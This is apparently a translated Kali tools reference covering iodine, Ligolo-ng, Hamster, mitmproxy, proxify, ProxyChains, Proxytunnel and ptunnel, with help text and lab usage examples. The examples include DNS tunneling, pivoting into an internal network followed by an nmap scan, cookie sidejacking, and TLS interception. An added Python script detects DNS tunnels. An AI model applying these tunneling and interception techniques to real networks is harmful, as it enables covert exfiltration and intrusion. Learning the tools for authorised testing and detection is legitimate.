04:22:06.906504 IP 192.168.11.3.43868 > 135.125.107.221.443: Flags [.], ack 1, win 502, options [nop,nop,TS val 3655079197 ecr 3794457547], length 0
04:22:06.906894 IP 192.168.11.3.43868 > 135.125.107.221.443: Flags [P.], seq 1:129, ack 1, win 502, options [nop,nop,TS val 3655079198 ecr 3794457547], length 128
04:22:06.909546 IP 135.125.107.221.443 > 192.168.11.3.43868: Flags [.], ack 129, win 227, options [nop,nop,TS val 3794457551 ecr 3655079198], length 0
04:22:12.872612 IP 192.168.11.3.43868 > 135.125.107.221.443: Flags [F.], seq 129, ack 1, win 502, options [nop,nop,TS val 3655085164 ecr 3794457551], length 0
04:22:12.873600 IP 135.125.107.221.443 > 192.168.11.3.43868: Flags [.], ack 130, win 4093, options [nop,nop,TS val 3794463515 ecr 3655079198], length 0
04:22:13.150575 IP 135.125.107.221.443 > 192.168.11.3.43868: Flags [F.], seq 1, ack 130, win 4096, options [nop,nop,TS val 3794463784 ecr 3655085164], length 0
iodine
Tunnels IPv4 traffic through DNS queries.
■ Usage
# Server
root@kali:~# iodined -h
Usage: iodined [-v] [-h] [-c] [-s] [-f] [-D] [-u user] [-t chrootdir] [-d device] [-m mtu] [-z context] [-l ip address to listen on] [-p port] [-n external ip] [-b dnsport] [-P password] [-F pidfile] tunnel_ip[/netmask] topdomain
-v to print version info and exit
-h to print this help and exit
-c to disable check of client IP/port on each request
-s to skip creating and configuring the tun device, which then has to be created manually
-f to keep running in foreground
-D to increase debug level
(using -DD in UTF-8 terminal: "LC_ALL=C luit iodined -DD ...")
-u name to drop privileges and run as user 'name'
-t dir to chroot to directory dir
-d device to set tunnel device name
-m mtu to set tunnel device mtu
-z context to apply SELinux context after initialization
-l ip address to listen on for incoming dns traffic (default 0.0.0.0)
-p port to listen on for incoming dns traffic (default 53)
-n ip to respond with to NS queries
-b port to forward normal DNS queries to (on localhost)
-P password used for authentication (max 32 chars will be used)
-F pidfile to write pid to a file
-i maximum idle time before shutting down
tunnel_ip is the IP number of the local tunnel interface.
/netmask sets the size of the tunnel network.
topdomain is the FQDN that is delegated to this server.
# Client
root@kali:~# iodine -h
Usage: iodine [-v] [-h] [-f] [-r] [-u user] [-t chrootdir] [-d device] [-P password] [-m maxfragsize] [-M maxlen] [-T type] [-O enc] [-L 0|1] [-I sec] [-z context] [-F pidfile] [nameserver] topdomain
Options to try if connection doesn't work:
-T force dns type: NULL, PRIVATE, TXT, SRV, MX, CNAME, A (default: autodetect)
-O force downstream encoding for -T other than NULL: Base32, Base64, Base64u,
Base128, or (only for TXT:) Raw (default: autodetect)
-I max interval between requests (default 4 sec) to prevent DNS timeouts
-L 1: use lazy mode for low-latency (default). 0: don't (implies -I1)
-m max size of downstream fragments (default: autodetect)
-M max size of upstream hostnames (~100-255, default: 255)
-r to skip raw UDP mode attempt
-P password used for authentication (max 32 chars will be used)
Other options:
-v to print version info and exit
-h to print this help and exit
-f to keep running in foreground
-u name to drop privileges and run as user 'name'
-t dir to chroot to directory dir
-d device to set tunnel device name
-z context, to apply specified SELinux context after initialization
-F pidfile to write pid to a file
nameserver is the IP number/hostname of the relaying nameserver. if absent, /etc/resolv.conf is used
topdomain is the FQDN that is delegated to the tunnel endpoint.
■ Usage example
# Start the server
root@kali_server:~# iodined -f -c -P hello 10.0.0.1 example.com
Opened dns0
Setting IP of dns0 to 10.0.0.1
Setting MTU of dns0 to 1130
Opened IPv4 UDP socket
Listening to dns for domain example.com
# dns0 is added to the interfaces
root@kali_server:~# ifconfig
dns0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1130
inet 10.0.0.1 netmask 255.255.255.224 destination 10.0.0.1
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 4071 bytes 360888 (352.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4113 bytes 500676 (488.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
[...]
# Start the client
root@kali_client:~# iodine -f -r 192.168.11.4 example.com
Enter password:
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for example.com to 192.168.11.4
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to 10.0.0.2
Setting MTU of dns0 to 1130
Server tunnel IP is 10.0.0.1
[...]
Connection setup complete, transmitting data.
# Start SSH as a SOCKS server
root@kali_client:~# ssh root@10.0.0.1 -N -D 9999
# Send an HTTP request via the SOCKS server
root@kali_client:~# curl -L -4 http://google.com -x socks5h://127.0.0.1:9999
# All traffic is carried over port 53
root@kali_client:~# tcpdump -n -i eth0 port 53 or port 80 or port 22
11:58:51.072332 IP 192.168.11.3.41204 > 192.168.11.4.53: 41211+ [1au] NULL? paaaioyq.example.com. (49)
11:58:51.072642 IP 192.168.11.4.53 > 192.168.11.3.41204: 33484*- 1/0/0 NULL (52)
11:58:54.253739 IP 192.168.11.3.41204 > 192.168.11.4.53: 48938+ [1au] NULL? 0aabv82M-J2hbM->M-nkM-VflM-AM-]lbM-^M-^5M-UM-geUdbM-BM-`dE4M-^M-^iKM-oM-AM-xM-vM-|M-}fM-PM-kiytM-DpDM-Z0cbmoM-UM-b.gM-bM-lM-LrM-eRM-<jaM-MXM-wv6WM-F2kM-rM-@M-ME7M->QM-qTEM-qMM-hM-{OM-uM-wM-MM-MOM-pFM-EM-uBM-iIM-{3M-cM-gM-TY0SPM-}M-U.M-IM-sM-OM-mM-YAMM-bM-rM-WN4M-KzXM-RM-@GM-xM-eM-cM-AM-Ga6M-ubLM-J.example.com. (191)
11:58:54.254460 IP 192.168.11.4.53 > 192.168.11.3.41204: 41211*- 1/0/0 NULL (115)
11:58:54.254672 IP 192.168.11.3.41204 > 192.168.11.4.53: 56665+ [1au] NULL? 0ebbw82M-J2hbM->M-nkM-VglM-IM-]RbM-^M-^5M-]M-f4UdbM-BM-`dE4M-^M-^iKM-oM-AM-{M-wM-uM-|lLM-XaYhmFhM-aqyuW4M-Zq.M-YM-qgGM-IFTM-waGgM-HM-JD9.example.com. (119)
11:58:54.258191 IP 192.168.11.4.53 > 192.168.11.3.41204: 48938*- 1/0/0 NULL (257)
[...]
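The capture above is exactly what a resolver-side detection would look at. As an added example (my code, not iodine's or the page's), the script below parses tcpdump query lines of that shape and scores each query on three tunnel indicators: the NULL query type, the length of the data-carrying subdomain, and its character entropy. The thresholds, the alert cut-off and the two-label zone split are assumptions to tune against your own baseline.

```python
"""Score tcpdump DNS query lines for iodine-style tunnel indicators.

Added example; not part of the original page or of the iodine project.
The sample lines are constructed from the capture above plus one ordinary
A lookup for contrast.
"""
import math
import re

# tcpdump's DNS query summary, e.g.
#   11:58:51.072332 IP 192.168.11.3.41204 > 192.168.11.4.53: 41211+ [1au] NULL? paaaioyq.example.com. (49)
QUERY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.\d+ > (?P<dst>\d+\.\d+\.\d+\.\d+)\.53: "
    r"\d+\S* (?:\[[^\]]*\] )?(?P<qtype>[A-Za-z0-9]+)\? (?P<qname>\S+) \((?P<size>\d+)\)$"
)

# Query types iodine can be forced to use (-T). NULL/PRIVATE are almost never
# sent by ordinary clients; the others are legitimate but rare from endpoints.
STRONG_TYPES = {"NULL", "PRIVATE"}
WEAK_TYPES = {"TXT", "SRV", "MX", "CNAME"}

# Assumed thresholds; tune them against your own resolver traffic.
MAX_SUBDOMAIN_LEN = 50   # characters of encoded payload in one query name
ENTROPY_BITS = 3.5       # Shannon entropy (bits/char) of the subdomain part
ALERT_SCORE = 3


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of `text` (0.0 for empty input)."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_zone(qname: str, zone_labels: int = 2):
    """Split 'data.labels.example.com.' into ('data.labels', 'example.com').

    Assumes the delegated zone is the last two labels; adjust for
    public-suffix zones such as co.uk.
    """
    labels = qname.rstrip(".").split(".")
    if len(labels) <= zone_labels:
        return "", ".".join(labels)
    return ".".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])


def score_query(qtype: str, qname: str):
    """Return (score, reasons) for one query; higher means more tunnel-like."""
    sub, _zone = split_zone(qname)
    score, reasons = 0, []
    if qtype in STRONG_TYPES:
        score += 3
        reasons.append(f"qtype {qtype}")
    elif qtype in WEAK_TYPES:
        score += 1
        reasons.append(f"qtype {qtype}")
    if len(sub) > MAX_SUBDOMAIN_LEN:
        score += 2
        reasons.append(f"subdomain length {len(sub)}")
    ent = shannon_entropy(sub.replace(".", ""))
    if ent > ENTROPY_BITS:
        score += 1
        reasons.append(f"entropy {ent:.2f}")
    return score, reasons


def analyze(lines):
    """Parse tcpdump lines; return per-query findings and per-zone totals."""
    findings, per_zone = [], {}
    for line in lines:
        m = QUERY_RE.match(line.strip())
        if not m:
            continue  # not a query line (replies, "[...]", tcpdump banners)
        qtype, qname = m["qtype"], m["qname"]
        score, reasons = score_query(qtype, qname)
        _sub, zone = split_zone(qname)
        z = per_zone.setdefault(zone, {"queries": 0, "bytes": 0, "types": set()})
        z["queries"] += 1
        z["bytes"] += int(m["size"])
        z["types"].add(qtype)
        findings.append({"src": m["src"], "dst": m["dst"], "qtype": qtype, "qname": qname,
                         "score": score, "alert": score >= ALERT_SCORE, "reasons": reasons})
    return findings, per_zone


# Constructed sample: the short query from the capture above, one long
# data-carrying query shaped like the ones tcpdump rendered with M- escapes,
# and an ordinary A lookup.
LONG_LABEL = "0aabv82ZJ2hbN7nkVflA6lbXP5UegeUdbBBdE4XiKoAxvfPkiytDpDZ0cbmoUb"
SAMPLE_LINES = [
    "11:58:51.072332 IP 192.168.11.3.41204 > 192.168.11.4.53: 41211+ [1au] NULL? paaaioyq.example.com. (49)",
    f"11:58:54.253739 IP 192.168.11.3.41204 > 192.168.11.4.53: 48938+ [1au] NULL? {LONG_LABEL}."
    "gbLrReKjaMXwv6WF2krME7QqTEqMhOuwMOpFEuBiIx3cgTY0SP.example.com. (191)",
    "11:58:55.000000 IP 192.168.11.3.41204 > 192.168.11.4.53: 50001+ [1au] A? www.example.org. (33)",
]

if __name__ == "__main__":
    found, zones = analyze(SAMPLE_LINES)
    for f in found:
        flag = "ALERT" if f["alert"] else "ok   "
        print(f"{flag} {f['src']} -> {f['dst']} {f['qtype']:<7} score={f['score']} {', '.join(f['reasons'])}")
    for zone, z in zones.items():
        print(f"zone {zone}: {z['queries']} queries, {z['bytes']} bytes, types={sorted(z['types'])}")
```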
Ligolo-ng
Establishes a tunnel using a TUN interface.
■ Usage
# Server
root@kali:~# ligolo-proxy --help
Usage of ligolo-proxy:
-allow-domains string
autocert authorised domains, if empty, allow all domains, multiple domains should be comma-separated.
-autocert
automatically request letsencrypt certificates, requires port 80 to be accessible
-certfile string
TLS server certificate (default "certs/cert.pem")
-keyfile string
TLS server key (default "certs/key.pem")
-laddr string
listening address (default "0.0.0.0:11601")
-selfcert
dynamically generate self-signed certificates
-selfcert-domain string
The selfcert TLS domain to use (default "ligolo")
-v enable verbose mode
-version
show the current version
# Agent
root@kali:~# ligolo-agent --help
Usage of ligolo-agent:
-accept-fingerprint string
accept certificates matching the following SHA256 fingerprint (hex format)
-bind string
bind to ip:port
-connect string
connect to proxy (domain:port)
-ignore-cert
ignore TLS certificate validation (dangerous), only for debug purposes
-retry
auto-retry on error
-socks string
socks5 proxy address (ip:port)
-socks-pass string
socks5 password
-socks-user string
socks5 username
-v enable verbose mode
-version
show the current version
■ Usage example
# Start the server
root@kali_srv:~# ligolo-proxy -certfile cert.pem -keyfile key.pem
INFO[0000] Listening on 0.0.0.0:11601
ligolo-ng »
# Start the agent
# The fingerprint is the one obtained with the following command
# openssl x509 -fingerprint -sha256 -noout -in cert.pem | cut -d= -f2 | tr -d ':'
root@kali_ag:~# ligolo-agent -connect 192.168.11.3:11601 -v -accept-fingerprint 90F666CB05E3FCB5FA1013C305460772B69EA2D993C75A439EABDC8E127EB720
INFO[0000]/build/ligolo-ng-YhH1aP/ligolo-ng-0.6.2/cmd/agent/main.go:162 main.connect() Connection established
# Create a new interface on the server side
ligolo-ng » interface_create --name "evil-ch"
INFO[0109] Creating a new "evil-ch" interface...
INFO[0109] Interface created!
# Start a session with the agent
ligolo-ng » session
? Specify a session : 1 - #1 - root@kali_ag - [192.168.11.4]:44312
# Show the agent's interface information
[Agent : root@kali_ag] » ifconfig
[...]
┌───────────────────────────────────────────────┐
│ Interface 1 │
├──────────────┬────────────────────────────────┤
│ Name │ eth1 │
│ Hardware MAC │ 02:42:ac:12:00:02 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.65.2/24 │
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 2 │
├──────────────┬────────────────────────────────┤
│ Name │ eth0 │
│ Hardware MAC │ 02:42:ac:13:00:03 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.11.4/24 │
└──────────────┴────────────────────────────────┘
# Add a route (the agent's internal network) to the created interface
[Agent : root@kali_ag] » route_add --name evil-ch --route 192.168.65.0/24
INFO[1500] Route created.
# Start the tunnel on the specified interface
[Agent : root@kali_ag] » tunnel_start --tun evil-ch
[Agent : root@kali_ag] » INFO[1714] Starting tunnel to root@kali_ag
# With the tunnel up, run a port scan from the server against the agent's internal network
root@kali_srv:~# nmap -v -n 192.168.65.0/24 -T4 --unprivileged
Initiating Ping Scan at 06:34
Scanning 256 hosts [2 ports/host]
Completed Ping Scan at 06:34, 2.95s elapsed (256 total hosts)
[...]
Initiating Connect Scan at 06:34
Scanning 3 hosts [1000 ports/host]
[...]
Nmap scan report for 192.168.65.1
Host is up (0.016s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
111/tcp open rpcbind
8080/tcp open http-proxy
Nmap scan report for 192.168.65.2
Host is up (0.022s latency).
All 1000 scanned ports on 192.168.65.2 are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)
Nmap scan report for 192.168.65.3
Host is up (0.016s latency).
Not shown: 979 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Hamster
Runs as a proxy server and steals session cookies and the like.
■ Usage example
# Start the proxy server
root@kali:~# hamster-sidejack
--- HAMPSTER 2.0 side-jacking tool ---
beginning thread
Set browser to use proxy http://127.0.0.1:1234
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
# Send a request with Hamster set as the proxy
root@kali:~# curl http://192.168.11.4 -x http://127.0.0.1:1234 -b "wordpress_test_cookie=WP%20Cookie%20check; path=/"
root@kali:~# hamster-sidejack
--- HAMPSTER 2.0 side-jacking tool ---
beginning thread
Set browser to use proxy http://127.0.0.1:1234
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
# The request header information is displayed
GET /
GET / HTTP/1.1
Host: 192.168.11.4
User-Agent: curl/8.9.1
Accept: */*
Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/
mitmproxy
An interactive intercepting proxy with SSL/TLS support.
■ Usage
root@kali:~# mitmproxy --help
usage: mitmproxy [options]
options:
-h, --help show this help message and exit
--version show version number and exit
--options Show all options and their default values
--commands Show all commands and their signatures
--set option[=value] Set an option. When the value is omitted, booleans are set to true, strings and integers are set to None (if
permitted), and sequences are emptied. Boolean values can be true, false or toggle. Sequences are set using multiple
invocations to set for the same option.
-q, --quiet Quiet.
-v, --verbose Increase log verbosity.
--mode MODE, -m MODE The proxy server type(s) to spawn. Can be passed multiple times. Mitmproxy supports "regular" (HTTP), "transparent",
"socks5", "reverse:SPEC", "upstream:SPEC", and "wireguard[:PATH]" proxy servers. For reverse and upstream proxy modes,
SPEC is host specification in the form of "http[s]://host[:port]". For WireGuard mode, PATH may point to a file
containing key material. If no such file exists, it will be created on startup. You may append `@listen_port` or
`@listen_host:listen_port` to override `listen_host` or `listen_port` for a specific proxy mode. Features such as
client playback will use the first mode to determine which upstream server to use. May be passed multiple times.
--no-anticache
--anticache Strip out request headers that might cause the server to return 304-not-modified.
--no-showhost
--showhost Use the Host header to construct URLs for display.
--no-show-ignored-hosts
--show-ignored-hosts Record ignored flows in the UI even if we do not perform TLS interception. This option will keep ignored flows'
contents in memory, which can greatly increase memory usage. A future release will fix this issue, record ignored
flows by default, and remove this option.
--rfile PATH, -r PATH
Read flows from file.
--scripts SCRIPT, -s SCRIPT
Execute a script. May be passed multiple times.
--stickycookie FILTER
Set sticky cookie filter. Matched against requests.
--stickyauth FILTER Set sticky auth filter. Matched against requests.
--save-stream-file PATH, -w PATH
Stream flows to file as they arrive. Prefix path with + to append. The full path can use python strftime() formating,
missing directories are created as needed. A new file is opened every time the formatted string changes.
--no-anticomp
--anticomp Try to convince servers to send us un-compressed data.
--console-layout {horizontal,single,vertical}
Console layout.
--no-console-layout-headers
--console-layout-headers
Show layout component headers
Proxy Options:
--listen-host HOST Address to bind proxy server(s) to (may be overridden for individual modes, see `mode`).
--listen-port PORT, -p PORT
Port to bind proxy server(s) to (may be overridden for individual modes, see `mode`). By default, the port is mode-
specific. The default regular HTTP proxy spawns on port 8080.
--no-server, -n
--server Start a proxy server. Enabled by default.
--ignore-hosts HOST Ignore host and forward all traffic without processing it. In transparent mode, it is recommended to use an IP address
(range), not the hostname. In regular mode, only SSL traffic is ignored and the hostname should be used. The supplied
value is interpreted as a regular expression and matched on the ip or the hostname. May be passed multiple times.
--allow-hosts HOST Opposite of --ignore-hosts. May be passed multiple times.
--tcp-hosts HOST Generic TCP SSL proxy mode for all hosts that match the pattern. Similar to --ignore-hosts, but SSL connections are
intercepted. The communication contents are printed to the log in verbose mode. May be passed multiple times.
--upstream-auth USER:PASS
Add HTTP Basic authentication to upstream proxy and reverse proxy requests. Format: username:password.
--proxyauth SPEC Require proxy authentication. Format: "username:pass", "any" to accept any user/pass combination, "@path" to use an
Apache htpasswd file, or "ldap[s]:url_server_ldap[:port]:dn_auth:password:dn_subtree[?search_filter_key=...]" for LDAP
authentication.
--no-rawtcp
--rawtcp Enable/disable raw TCP connections. TCP connections are enabled by default.
--no-http2
--http2 Enable/disable HTTP/2 support. HTTP/2 support is enabled by default.
SSL:
--certs SPEC SSL certificates of the form "[domain=]path". The domain may include a wildcard, and is equal to "*" if not specified.
The file at path is a certificate in PEM format. If a private key is included in the PEM, it is used, else the default
key in the conf dir is used. The PEM file should contain the full certificate chain, with the leaf certificate as the
first entry. May be passed multiple times.
--cert-passphrase PASS
Passphrase for decrypting the private key provided in the --cert option. Note that passing cert_passphrase on the
command line makes your passphrase visible in your system's process list. Specify it in config.yaml to avoid this.
--no-ssl-insecure
--ssl-insecure, -k Do not verify upstream server SSL/TLS certificates.
Client Replay:
--client-replay PATH, -C PATH
Replay client requests from a saved file. May be passed multiple times.
Server Replay:
--server-replay PATH, -S PATH
Replay server responses from a saved file. May be passed multiple times.
--no-server-replay-kill-extra
--server-replay-kill-extra
Kill extra requests during replay (for which no replayable response was found).[Deprecated, prefer to use
server_replay_extra='kill']
--server-replay-extra {forward,kill,204,400,404,500}
Behaviour for extra requests during replay for which no replayable response was found. Setting a numeric string value
will return an empty HTTP response with the respective status code.
--no-server-replay-reuse
--server-replay-reuse
Don't remove flows from server replay state after use. This makes it possible to replay same response multiple times.
--no-server-replay-refresh
--server-replay-refresh
Refresh server replay responses by adjusting date, expires and last-modified headers, as well as adjusting cookie
expiration.
Map Remote:
--map-remote PATTERN, -M PATTERN
Map remote resources to another remote URL using a pattern of the form "[/flow-filter]/url-regex/replacement", where
the separator can be any character. May be passed multiple times.
Map Local:
--map-local PATTERN Map remote resources to a local file using a pattern of the form "[/flow-filter]/url-regex/file-or-directory-path",
where the separator can be any character. May be passed multiple times.
Modify Body:
--modify-body PATTERN, -B PATTERN
Replacement pattern of the form "[/flow-filter]/regex/[@]replacement", where the separator can be any character. The @
allows to provide a file path that is used to read the replacement string. May be passed multiple times.
Modify Headers:
--modify-headers PATTERN, -H PATTERN
Header modify pattern of the form "[/flow-filter]/header-name/[@]header-value", where the separator can be any
character. The @ allows to provide a file path that is used to read the header value string. An empty header-value
removes existing header-name headers. May be passed multiple times.
Filters:
See help in mitmproxy for filter expression syntax.
--intercept FILTER Intercept filter expression.
--view-filter FILTER Limit the view to matching flows.
■ Usage example
# Start the proxy server
root@kali:~# mitmproxy
# Download the CA certificate
root@kali:~# curl --proxy 127.0.0.1:8080 -o mitmproxy-ca-cert.pem http://mitm.it/cert/pem
# Call an external API via the proxy
root@kali:~# curl --proxy 127.0.0.1:8080 --cacert mitmproxy-ca-cert.pem https://fakerapi.it/api/v2/addresses
The contents of the HTTPS traffic are displayed in real time in the console
proxify
A proxy with traffic filtering and replacement and a built-in DNS server.
■ Usage
root@kali:~# proxify --help
Usage:
./proxify [flags]
Flags:
OUTPUT:
-sr, -store-response store raw http request / response to output directory (default proxify_logs)
-o, -output output file to store proxify logs (default proxify_logs.jsonl)
-of, -output-format string output format (jsonl/yaml) (default "jsonl")
-dump-req Dump only HTTP requests to output file
-dump-resp Dump only HTTP responses to output file
-oca, -out-ca string Generate and Save CA File to filename
UPDATE:
-up, -update update proxify to latest version
-duc, -disable-update-check disable automatic proxify update check
FILTER:
-req-fd, -request-dsl string[] Request Filter DSL
-resp-fd, -response-dsl string[] Response Filter DSL
-req-mrd, -request-match-replace-dsl string[] Request Match-Replace DSL
-resp-mrd, -response-match-replace-dsl string[] Response Match-Replace DSL
NETWORK:
-ha, -http-addr string Listening HTTP IP and Port address (ip:port) (default "127.0.0.1:8888")
-sa, -socks-addr Listening SOCKS IP and Port address (ip:port) (default 127.0.0.1:10080)
-da, -dns-addr string Listening DNS IP and Port address (ip:port)
-dm, -dns-mapping string Domain to IP DNS mapping (eg domain:ip,domain:ip,..)
-r, -resolver string Custom DNS resolvers to use (ip:port)
PROXY:
-hp, -http-proxy string[] Upstream HTTP Proxies (eg http://proxy-ip:proxy-port)
-sp, -socks5-proxy string[] Upstream SOCKS5 Proxies (eg socks5://proxy-ip:proxy-port)
-c int Number of requests before switching to the next upstream proxy (default 1)
EXPORT:
-max-size int Max export data size (request/responses will be truncated) (default 9223372036854775807)
CONFIGURATION:
-config string path to the proxify configuration file
-ec, -export-config string proxify export module configuration file (default "/root/.config/proxify/export-config.yaml")
-config-directory string override the default config path ($home/.config/proxify) (default "/root/.config/proxify")
-cert-cache-size int Number of certificates to cache (default 256)
-a, -allow string[] Allowed list of IP/CIDR's to be proxied
-d, -deny string[] Denied list of IP/CIDR's to be proxied
-pt, -passthrough string[] List of passthrough domains
DEBUG:
-nc, -no-color No Color
-version Version
-silent Silent
-v, -verbose Verbose
-vv, -very-verbose Very Verbose
■ Usage example
# Map example.com to a different IP address
root@kali:~# proxify -dns-addr ":53" -dns-mapping "example.com:192.168.11.4" -resolver "8.8.8.8:53"
[INF] Current proxify version v0.0.15 (latest)
[INF] HTTP Proxy Listening on 127.0.0.1:8888
[INF] Saving proxify logs to proxify_logs.jsonl
[INF] Domain => IP: example.com:192.168.11.4
[INF] Fallback Resolver: 8.8.8.8:53
# Without the proxy
root@kali:~# curl http://example.com
<!doctype html>
<html>
<head>
<title>Example Domain</title>
[...]
# With proxify set as the proxy
root@kali:~# curl -x http://127.0.0.1:8888 http://example.com
hello
# Rewrite the request contents
root@kali:~# proxify -request-match-replace-dsl "replace(request,'posts/1','posts/2')"
# Without the proxy
root@kali:~# curl http://jsonplaceholder.typicode.com/posts/1
{
"userId": 1,
"id": 1,
"title": "sunt aut facere repellat provident occaecati excepturi optio reprehenderit",
"body": "quia et suscipit\nsuscipit recusandae consequuntur expedita et cum\nreprehenderit molestiae ut ut quas totam\nnostrum rerum est autem sunt rem eveniet architecto"
}
# With proxify set as the proxy
root@kali:~# curl --proxy http://127.0.0.1:8888 http://jsonplaceholder.typicode.com/posts/1
{
"userId": 1,
"id": 2,
"title": "qui est esse",
"body": "est rerum tempore vitae\nsequi sint nihil reprehenderit dolor beatae ea dolores neque\nfugiat blanditiis voluptate porro vel nihil molestiae ut reiciendis\nqui aperiam non debitis possimus qui neque nisi nulla"
}
ProxyChains-NG
Hooks a program's network-related libc functions and redirects its connections through a SOCKS4a/5 or HTTP proxy.
■ Usage
root@kali:~# proxychains4 --help
Usage: proxychains4 -q -f config_file program_name [arguments]
-q makes proxychains quiet - this overrides the config setting
-f allows one to manually specify a configfile to use
for example : proxychains telnet somehost.com
■ Usage example
# Forward connections from host 2 to host 3
root@kali_2:~# ncat -l 8081 --sh-exec "ncat 192.168.56.3"
# Listen on host 3
root@kali_3:~# ncat -l
# Run a telnet connection on host 1 (forwarded to host 2, which is configured as the proxy in /etc/proxychains4.conf)
root@kali_1:~# proxychains4 telnet localhost 23
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Trying 127.0.0.1...
[proxychains] Strict chain ... 192.168.11.4:8081 ... 127.0.0.1:23 ... OK
Connected to localhost.
Escape character is '^]'.
hello
# Typing hello on host 1 is relayed via host 2 to host 3, where hello is displayed (host 1 and host 3 are on different networks and cannot communicate directly)
root@kali_3:~# ncat -l
hello
Proxytunnel
Creates tunnels for TCP-based protocols through HTTP(S) proxies.
■ Usage
root@kali:~# proxytunnel --help
Usage: proxytunnel [OPTIONS]...
Standard options:
-i, --inetd Run from inetd (default: off)
-a, --standalone=STRING Run as standalone daemon on specified port or
address:port combination
-p, --proxy=STRING Local proxy host:port combination
-r, --remproxy=STRING Remote proxy host:port combination (using 2 proxies)
-d, --dest=STRING Destination host:port combination
-e, --encrypt SSL encrypt data between local proxy and destination
-E, --encrypt-proxy SSL encrypt data between client and local proxy
-X, --encrypt-remproxy SSL encrypt data between local and remote proxy
Additional options for specific features:
-W, --wa-bug-29744 Workaround ASF Bugzilla 29744: if SSL is active
stop using it after CONNECT (might not work on all
setups)
-B, --buggy-encrypt-proxy Equivalent to -E -W, provided for backwards
compatibility
-z, --no-check-certificate Don't verify server SSL certificate
-C, --cacert=STRING Path to trusted CA certificate or directory
-4, --ipv4 Enforce IPv4 connection to local proxy
-6, --ipv6 Enforce IPv6 connection to local proxy
-F, --passfile=STRING File with credentials for proxy authentication
-P, --proxyauth=STRING Proxy auth credentials user:pass combination
-R, --remproxyauth=STRING Remote proxy auth credentials user:pass combination
-c, --cert=FILENAME client SSL certificate (chain)
-k, --key=FILENAME client SSL key
-N, --ntlm Use NTLM based authentication
-t, --domain=STRING NTLM domain (default: autodetect)
-H, --header=STRING Add additional HTTP headers to send to proxy
-o, --host=STRING Send custom Host Header/SNI
-x, --proctitle=STRING Use a different process title
Miscellaneous options:
-v, --verbose Turn on verbosity
-q, --quiet Suppress messages
-h, --help Print help and exit
-V, --version Print version and exit
■ Usage example
# Listen on port 8080 and connect to the target host (192.168.56.3:22) via the proxy (192.168.56.2:8888)
root@kali_2:~# proxytunnel -p 192.168.56.2:8888 -d 192.168.56.3:22 -a 8080
# SSH to the host running proxytunnel
root@kali_1:~# ssh hello@192.168.11.4 -p 8080
Last login: Wed Nov 6 07:08:47 2024 from 192.168.56.2
$ hostname
kali_3
ptunnel
Tunnels TCP connections to a remote host using ICMP echo request and reply packets.
■ Usage
root@kali:~# ptunnel --help
Usage: ptunnel -p <addr> -lp <port> -da <dest_addr> -dp <dest_port> [-m max_tunnels] [-v verbosity] [-f logfile]
ptunnel [-m max_threads] [-v verbosity] [-c <device>]
-p: Set address of peer running packet forwarder. This causes
ptunnel to operate in forwarding mode - the absence of this
option causes ptunnel to operate in proxy mode.
-lp: Set TCP listening port (only used when operating in forward mode)
-da: Set remote proxy destination address if client
Restrict to only this destination address if server
-dp: Set remote proxy destionation port if client
Restrict to only this destination port if server
-m: Set maximum number of concurrent tunnels
-v: Verbosity level (-1 to 4, where -1 is no output, and 4 is all output)
-c: Enable libpcap on the given device.
-f: Specify a file to log to, rather than printing to standard out.
-s: Client only. Enables continuous output of statistics (packet loss, etc.)
-daemon: Run in background, the PID will be written in the file supplied as argument
-syslog: Output debug to syslog instead of standard out.
-udp: Toggle use of UDP instead of ICMP. Proxy will listen on port 53 (must be root).
Security features: [-x password] [-u] [-setuid user] [-setgid group] [-chroot dir]
-x: Set password (must be same on client and proxy)
-u: Run proxy in unprivileged mode. This causes the proxy to forward
packets using standard echo requests, instead of crafting custom echo replies.
Unprivileged mode will only work on some systems, and is in general less reliable
than running in privileged mode.
Please consider combining the following three options instead:
-setuid: When started in privileged mode, drop down to user's rights as soon as possible
-setgid: When started in privileged mode, drop down to group's rights as soon as possible
-chroot: When started in privileged mode, restrict file access to the specified directory
-setcon: Set SELinux context when all there is left to do are network I/O operations
To combine with -chroot you will have to `mount --bind /proc /chrootdir/proc`
■ Usage example
# Start the ptunnel proxy on the proxy host
root@kali_2:~# ptunnel
[inf]: Starting ptunnel v 0.72.
[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
